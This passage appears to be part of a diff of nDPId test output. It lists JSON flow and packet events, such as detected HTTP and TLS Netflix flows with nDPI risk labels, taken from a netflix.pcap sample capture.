-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1484319056279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056279,"pkt":"gCqoTGHM5JjWH70UCABFAAA0AZpAAEAGU\/jAqAEHF\/YLjc+5AFBMFfUFz2h9PYAQEBUYcgAAAQEICh9lEL40r6Zm"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
-01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1484319056303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056303,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7wVYmHmLePyuKAS\/\/9RBgAAAgQFtAEDAwkEAggKED1piB9lEJo="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1484319056313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056313,"pkt":"gCqoTGHM5JjWH70UCABFAAA0DEJAAEAGSVDAqAEHF\/YLjc+8AFAt4\/K4FWJh54AQEBVvgQAAAQEICh9lENgQPWmI"} -01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz72N4Tx+gHq67aAS\/\/8YZwAAAgQFtAEDAwkEAggKc9HQqh9lEJ4="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz749DprObTkJu6AS\/\/9Z3AAAAgQFtAEDAwkEAggKxO\/1DB9lEJ4="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BrtAAEAGTtfAqAEHF\/YLjc+9AFCAerrtjeE8f4AQEBU20gAAAQEICh9lEOxz0dCq"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Fj1AAEAGP1XAqAEHF\/YLjc++AFBtOQm7PQ6az4AQEBV4RwAAAQEICh9lEOzE7\/UM"} 
-01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064590,"flow_last_seen":1484319064590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064590,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1484319064590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064590,"pkt":"gCqoTGHM5JjWH70UCABFAABAVptAAEAGBuzAqAEHF\/YDjM+\/AFBrAzOSAAAAALAC\/\/+cMAAAAgQFtAEDAwUBAQgKH2UvkQAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064593,"flow_last_seen":1484319064593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064593,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1484319064593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064593,"pkt":"gCqoTGHM5JjWH70UCABFAABAVrtAAEAG\/srAqAEHF\/YLjc\/AAFDz13keAAAAALAC\/\/\/FywAAAgQFtAEDAwUBAQgKH2UvkwAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz8BQi7Oi89d5H6AS\/\/+uwwAAAgQFtAEDAwkEAggKYvDA2R9lL5M="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz78\/hnHMawMzk6AS\/\/+duQAAAgQFtAEDAwkEAggKbx\/u9B9lL5E="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0SOFAAEAGDLHAqAEHF\/YLjc\/AAFDz13kfUIuzo4AQEBXNXwAAAQEICh9lL7Bi8MDZ"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0y1dAAEAGkjvAqAEHF\/YDjM+\/AFBrAzOTP4ZxzYAQEBW8UwAAAQEICh9lL7BvH+70"} 
-01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} -01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064669,"flow_last_seen":1484319064669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064669,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1484319064669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064669,"pkt":"gCqoTGHM5JjWH70UCABFAABAhwJAAEAGqhTAqAEHNr8RM8\/JAbsptVYdAAAAALAC\/\/+MwgAAAgQFtAEDAwUBAQgKH2Uv3QAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064671,"flow_last_seen":1484319064671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064671,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1484319064671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064671,"pkt":"gCqoTGHM5JjWH70UCABFAABAbOBAAEAGxDbAqAEHNr8RM8\/SAbtTxg2UAAAAALAC\/\/+rMAAAAgQFtAEDAwUBAQgKH2Uv3gAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049684,"flow_last_seen":1484319049684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049684,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1484319049684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049684,"pkt":"gCqoTGHM5JjWH70UCABFAABAHF1AAEAGFLrAqAEHNr8RM8+qAbupwyRaAAAAALAC\/\/92fwAAAgQFtAEDAwUBAQgKH2T39AAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1484319049697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049697,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lq4GcwYwKgBBwBQz6GV0BcIYCoytaAScSDlwwAAAgQFtAQCCAr\/\/IQ4H2T36AEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1484319049700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049700,"pkt":"gCqoTGHM5JjWH70UCABFAAA0bmdAAEAGhnvAqAEHuBnMGM+hAFBgKjK1ldAXCYAQEBV1gAAAAQEICh9k+AH\/\/IQ4"} 
+00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1484319049740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049740,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z6pwpjzKqcMkW6ASOJCp2gAAAgQFtAQCCAqtikoKH2T39AEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1484319049743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049743,"pkt":"gCqoTGHM5JjWH70UCABFAAA0ddRAAEAGu07AqAEHNr8RM8+qAbupwyRbcKY8y4AQEBUA7QAAAQEICh9k+CqtikoK"} 
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 